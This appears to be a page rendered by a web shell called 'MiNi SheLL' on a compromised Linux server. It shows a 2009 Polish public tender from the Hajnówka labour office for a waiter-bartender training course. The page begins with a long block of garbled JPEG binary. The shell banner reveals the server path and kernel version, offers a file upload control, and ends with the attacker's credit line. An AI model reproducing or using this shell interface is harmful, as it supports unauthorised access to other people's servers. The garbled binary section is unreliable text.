JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090508/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090508/72801-N-2009.html

<p class="kh_header"><b>Hajnówka: Przedmiotem zamówienia publicznego jest zorganizowanie i przeprowadzenie szkolenia o nazwie:
Kelner-barman z modułem języka angielskiego

Zakres szkolenia: samodzielne wykonywanie zadań w sali konsumpcyjnej i w bufecie z modułem języka angielskiego.

Szkolenie dla 10-osobowej grupy bezrobotnych</b><br>
<b>Numer ogłoszenia: 72801 - 2009; data zamieszczenia: 08.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Hajnówce , ul. Józefa Piłsudskiego 10A, 17-200 Hajnówka, woj. podlaskie, tel. 0-85 6829610, faks 0-85 6829611.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.hajnowka.sisco.info/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia publicznego jest zorganizowanie i przeprowadzenie szkolenia o nazwie:
Kelner-barman z modułem języka angielskiego

Zakres szkolenia: samodzielne wykonywanie zadań w sali konsumpcyjnej i w bufecie z modułem języka angielskiego.

Szkolenie dla 10-osobowej grupy bezrobotnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego jest zorganizowanie i przeprowadzenie szkolenia o nazwie:
Kelner-barman z modułem języka angielskiego

Zakres szkolenia: samodzielne wykonywanie zadań w sali konsumpcyjnej i w bufecie z modułem języka angielskiego.

Szkolenie dla 10-osobowej grupy bezrobotnych:
Czas trwania szkolenia: czerwiec - lipiec 2009r.
Koszt szkolenia powinien zawierać koszt ubezpieczenia uczestników szkolenia               od następstw nieszczęśliwych wypadków i przewidywany koszt dowożenia uczestników na miejsce szkolenia (w przypadku prowadzenia zajęć szkolenia poza miastem Hajnówka).
Pożądany termin rozpoczęcia szkolenia: 08.06.2009r.
Warunki organizacyjne przeprowadzenia szkolenia:
a)	termin realizacji szkolenia:			   do dnia 31.07.2009r.,
b)	miejsce szkolenia:				   województwo podlaskie,
c)	szkolenie powinno odbywać się w formie kursu, realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych              w tygodniu zgodnie art.40 ust. 4 ustawy z dnia 20.04.2008r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. nr 69, poz. 415 z późn. zm.),
d)	wyposażenie bazy szkoleniowej powinno umożliwić każdemu uczestnikowi kursu   
	       poznanie i przyuczenie do pracy wraz z umiejętnościami będącymi przedmiotem 
            szkolenia,
e)	szkolenie powinno zakończyć się oceną opanowania wiedzy i nabytych umiejętności, określeniem rodzaju zdobytych kwalifikacji oraz wydaniem osobom szkolonym zaświadczeń kwalifikacyjnych, świadectw lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji w języku polskim i języku angielskim,
f)	zapewnienie warunków pracy zgodnie z przepisami bezpieczeństwa i higieny  pracy w trakcie trwania szkolenia,
g)	zapewnienie koniecznego sprzętu, jaki powinien zostać dostarczony beneficjentom ostatecznym na czas trwania szkolenia.

Zamawiający nie dopuszcza możliwości składania ofert częściowych.
Zamawiający nie dopuszcza możliwości składania ofert wariantowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 08.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> V. Opis sposobu przygotowania oferty:
1.	Na ofertę składają się: oferta cenowa oraz wszystkie pozostałe wypełnione załączniki do Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ, a także wszystkie wymagane dokumenty zgodnie z rozdziałem IX SIWZ. 
2.	Wykonawcy sporządzą oferty zgodnie z wymaganiami SIWZ. 
3.	W przypadku, gdy wykonawcę reprezentuje pełnomocnik do oferty musi być załączone pełnomocnictwo, w formie oryginału, określające zakres pełnomocnictwa. Pełnomocnictwo musi być podpisane przez osoby uprawnione do reprezentowania podmiotu, chyba że pełnomocnictwo wynika z innych załączonych do oferty dokumentów.
4.	Oferta cenowa musi być sporządzona na formularzu oferty stanowiącym załącznik Nr 1 do SIWZ.
5.	Oferta musi być sporządzona w języku polskim, na maszynie do pisania, komputerze, ręcznie długopisem lub nieścieralnym atramentem. Oferty nieczytelne zostaną odrzucone.
6.	Oferta cenowa oraz pozostałe załączniki i wszystkie wymagane dokumenty muszą być podpisane przez osoby upoważnione do składania oświadczeń woli w imieniu wykonawcy. Upoważnienie do podpisania oferty cenowej i załączników musi być dołączone do oferty, o ile nie wynika ono z innych dokumentów załączonych przez wykonawcę.
7.	W przypadku, gdy wykonawca dołącza do oferty kopię jakiegoś dokumentu, musi być ona poświadczona za zgodność z oryginałem przez wykonawcę (wykonawca na kserokopii składa własnoręczny podpis poprzedzony dopiskiem za zgodność). Jeżeli do podpisania oferty upoważnione są łącznie dwie lub więcej osób kopie dokumentów muszą być potwierdzone za zgodność z oryginałem przez wszystkie te osoby.
8.	Wszystkie dokumenty i oświadczenia sporządzone w języku obcym mają być złożone wraz z tłumaczeniami na język polski sporządzonymi przez tłumacza przysięgłego.
9.	Zaleca się, aby wszystkie strony oferty były ponumerowane. Ponadto, wymaga się, aby wszelkie miejsca, w których wykonawca naniósł zmiany, były przez niego parafowane.
10.	Oferta powinna być trwale zespolona tak, aby niemożliwe było jej przypadkowe zdekompletowanie.
11.	Wykonawca składa tylko jedną ofertę. Alternatywy zawarte w treści oferty spowodują jej odrzucenie. Złożenie większej liczby ofert spowoduje odrzucenie wszystkich ofert Wykonawcy.
12.	Wykonawca, nie później niż przed upływem terminu składania ofert, ma prawo zastrzec w swojej ofercie informacje stanowiące tajemnicę przedsiębiorstwa w rozumowaniu przepisów o zwalczaniu nieuczciwej konkurencji. W tym przypadku powinien zastrzeżoną część oferty oznaczyć w sposób nie budzący wątpliwości, iż stanowi ona zastrzeżoną tajemnicę przedsiębiorstwa np. umieścić ją w odrębnym wydzielonym opakowaniu oznaczonym napisem: TAJEMNICA PRZEDSIEBIORSTWA - NIE UDOSTĘPNIAĆ  
13.	Nie dopuszcza się składania ofert częściowych, wariantowych i równoważnych.
14.	Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
15.	Zamawiający nie dopuszcza wykonania przedmiotu zamówienia przy udziale podwykonawców.
16.	Wykonawca ponosi wszelkie koszty związane z przygotowaniem i złożeniem oferty.
17.	Zaleca się, aby wykonawca zamieścił ofertę w zewnętrznej i wewnętrznej kopercie z tym, że:
a) zewnętrzna koperta powinna być oznaczona w następujący sposób: Powiatowy Urząd Pracy w Hajnówce ul. Piłsudskiego 10 A, 17-200 Hajnówka, przetarg nieograniczony - oferta na usługę szkolenia Kelner-barman z modułem języka angielskiego oraz nie otwierać przed 25.05.2009r., godz. 8.00 - bez nazwy i pieczątki wykonawcy;
b)	koperta wewnętrzna powinna zawierać ofertę i być zaadresowana na wykonawcę, tak aby można było odesłać ofertę w przypadku jej wpłynięcia po terminie.
18.	Skutki związane z nie oznaczeniem koperty w sposób podany w SIWZ ponosi wykonawca.
19.	Nie oznaczenie oferty w sposób podany w SIWZ nie skutkuje odrzuceniem oferty.
20.	Oferta jest jawna od chwili jej otwarcia, za wyjątkiem informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, a wykonawca zastrzegł w odniesieniu do tych informacji, że nie mogą być one udostępnione innym uczestnikom postępowania.
XIII. Kryteria wyboru oferty najkorzystniejszej. Termin związania ofertą.

Wybór oferty najkorzystniejszej zostanie dokonany według następującego kryterium oceny ofert:
1)	Koszt szkolenia - 100 pkt*
Przez koszt szkolenia rozumie się należność przysługującą instytucji szkoleniowej oraz koszt ubezpieczenia kursantów od następstw nieszczęśliwych wypadków. W/w ubezpieczenie obejmować ma kursantów od chwili wyruszenia do miejsca odbywania szkolenia do chwili dotarcia z powrotem do domu.
	Sposób przyznania punktów w kryterium koszt szkolenia:
	        cena najniższa
		------------------------------------------------	 x waga kryterium
                  	    cena oferty badanej


* Rażąco niska cena w stosunku do przedmiotu zamówienia jak i oszacowanej kwoty, którą Zamawiający ma zamiar przeznaczyć na sfinansowanie szkolenia będzie stanowiło podstawę do odrzucenia oferty na podstawie art. 89 ust. 1 pkt 4 ustawy Prawo zamówień publicznych.

1.	Wykonawca pozostaje związany ofertą przez okres 30 dni.
2.	Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
3.	Zamawiający dokona badania ofert w celu stwierdzenia, czy wykonawcy nie podlegają wykluczeniu. W przypadku wykluczenia wykonawcy, zamawiający odrzuci jego ofertę. Następnie zamawiający dokona oceny, czy oferty wykonawców niewykluczonych                  z postępowania nie podlegają odrzuceniu.
4.	W toku badania i oceny ofert zamawiający może żądać od wykonawców wyjaśnień dotyczących treści złożonych ofert.
5.	Zamawiający poprawi w tekście oferty oczywiste omyłki pisarskie oraz omyłki rachunkowe w obliczeniu ceny, niezwłocznie zawiadamiając o tym wszystkich wykonawców, którzy złożyli oferty.
6.	Omyłki rachunkowe w obliczeniu ceny zamawiający poprawi na zasadach określonych w art. 88 ustawy.
7.	Zamawiający odrzuci ofertę, jeżeli:
1)	jest niezgodna z ustawą,
2)	jej treść nie odpowiada treści SIWZ,
3)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
4)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
5)	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
6)	zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na podstawie art. 88, lub błędy w obliczeniu ceny,
7)	wykonawca w terminie 7 dni od dnia otrzymania za?wiadomienia nie zgodził się na poprawienie omyłki rachunkowej w obliczeniu ceny,
8)	jest nieważna na podstawie odrębnych przepisów.
8.	Zamawiający zawiadomi równocześnie wszystkich wykonawców, którzy złożyli oferty o wykluczeniu wykonawców lub odrzuceniu ofert, podając uzasadnienie faktyczne i prawne.
9.	Oferty nie odrzucone zostaną poddane procedurze oceny zgodnie z kryteriami oceny ofert określonymi w SIWZ.
10.	Za ofertę najkorzystniejszą zostanie uznana oferta, która w sumie uzyska największą liczbę punktów.
11.	O wyborze najkorzystniejszej oferty zamawiający niezwłocznie zawiadomi wykonawców, którzy złożyli oferty, wskazując nazwę (firmę) i adres tego wykonawcy, którego ofertę wybrano, cenę oraz uzasadnienie wyboru. 
12.	W przypadku wystąpienia przesłanek, o których mowa w art. 93 ust. 1 ustawy zamawiający unieważnia postępowanie.
13.	O unieważnieniu postępowania po upływie terminu składania ofert zamawiający zawiadomi równocześnie wszystkich wykonawców, którzy złożyli oferty podając uzasadnienie faktyczne i prawne.
14.	Ogłoszenie o wyniku postępowania bez względu na rezultat zostanie ponadto umieszczone na stronie urzędu pracy i na tablicy ogłoszeń w tut. urzędzie. 
15.	Ogłoszenie o zawarciu umowy w sprawie zamówienia publicznego zamawiający zamieszcza na stronie portalu internetowego Urzędu Zamówień Publicznych, na własnej stronie internetowej oraz na tablicy ogłoszeń w siedzibie urzędu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> VIII. Wymagane oświadczenia lub dokumenty od wykonawcy. 

1. W przetargu mogą wziąć udział wykonawcy, którzy:
1)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych,
2)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
3)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
4)	posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
2.	Stwierdzenie spełnienia w/w warunków odbędzie się poprzez analizę i ocenę dokumentów żądanych przez zamawiającego od wykonawcy przez powołaną przez zamawiającego komisję przetargową.
IX. Wykaz dokumentów potwierdzających spełnianie wymaganych warunków:

	W celu potwierdzenia spełniania wymaganych warunków Wykonawcy obowiązani są złożyć następujące dokumenty:
1.	Wypełnioną i podpisaną ofertę (na formularzu stanowiącym załącznik nr 1 do SIWZ) wraz z wypełnionym preliminarzem kursu (załącznik nr 4 do SIWZ) oraz oświadczeniem ( stanowiącym załącznik nr 2 do SIWZ). 
2.	Parafowany przez wykonawcę wzór umowy (na formularzu stanowiącym załącznik nr 3 do SIWZ).
3.	Odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (lub dokument potwierdzony w tym terminie przez organ wydający).
4.	Zaświadczenie z urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, lub, że uzyskał zgodę na odroczenie lub rozłożenie na raty zaległych płatności albo zaświadczenie o wstrzymaniu w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.	Zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub, że uzyskał zgodę na odroczenie lub rozłożenie na raty zaległych płatności, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.	Oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych (na formularzu oświadczenia zawartym w załączniku nr 1 do SIWZ).
7.	Oświadczenie wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (na formularzu oświadczenia zawartym w załącznik nr 1 do SIWZ).
8.	Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 Prawa zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Prawa zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
10.	Wykaz wszystkich wykonanych w ciągu ostatniego roku zamówień publicznych z podaniem ich wartości oraz daty i miejsca realizacji.
11.	Zaświadczenie o wpisie do rejestru instytucji szkoleniowych.
12.	Informacje o warunkach lokalowych, miejscu przeprowadzenia zajęć teoretycznych i praktycznych (nazwa, adres), wyposażenie bazy szkoleniowej, 
13.	Opis warunków technicznych i materiałów dydaktycznych niezbędnych do przeprowadzenia szkolenia (na formularzu stanowiącym załącznik nr 6 do SIWZ)
14.	Program szkolenia z wyszczególnieniem liczby godzin przewidzianych na poszczególne zagadnienia oraz liczby godzin przewidzianych na zajęcia praktyczne (na formularzu stanowiącym załącznik nr 5 do SIWZ).
15.	Informacja o sposobie kontroli umiejętności i wiedzy zdobytej przez słuchaczy podczas szkolenia oraz rodzaju wydawanych dokumentów po zakończeniu szkolenia.
16.	Charakterystyka i opis materiałów szkoleniowych, które otrzymują nieodpłatnie uczestnicy kursu.
17.	Wykaz wykładowców przewidzianych do przeprowadzenia szkolenia wraz z charakterystyką ich przygotowania zawodowego: imię i nazwisko, poziom wykształcenia, doświadczenie zawodowe i pedagogiczne oraz ich rola w realizacji zamówienia (określić rodzaj/tematykę zajęć omawianych przez danego wykładowcę).
18.	Informację na temat działań promocyjnych na rzecz zatrudnienia uczestników szkolenia.
19.	Do oferty szkolenia należy dołączyć wzór zaświadczenia, świadectwa lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://pup.hajnowka.sisco.info/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 17-200 Hajnówka, ul. Piłsudskiego 10A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2009 godzina 08:00, miejsce: Powiatowy Urząd Pracy w Hajnówce, ul. Piłsudskiego 10 A w pok. 14 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com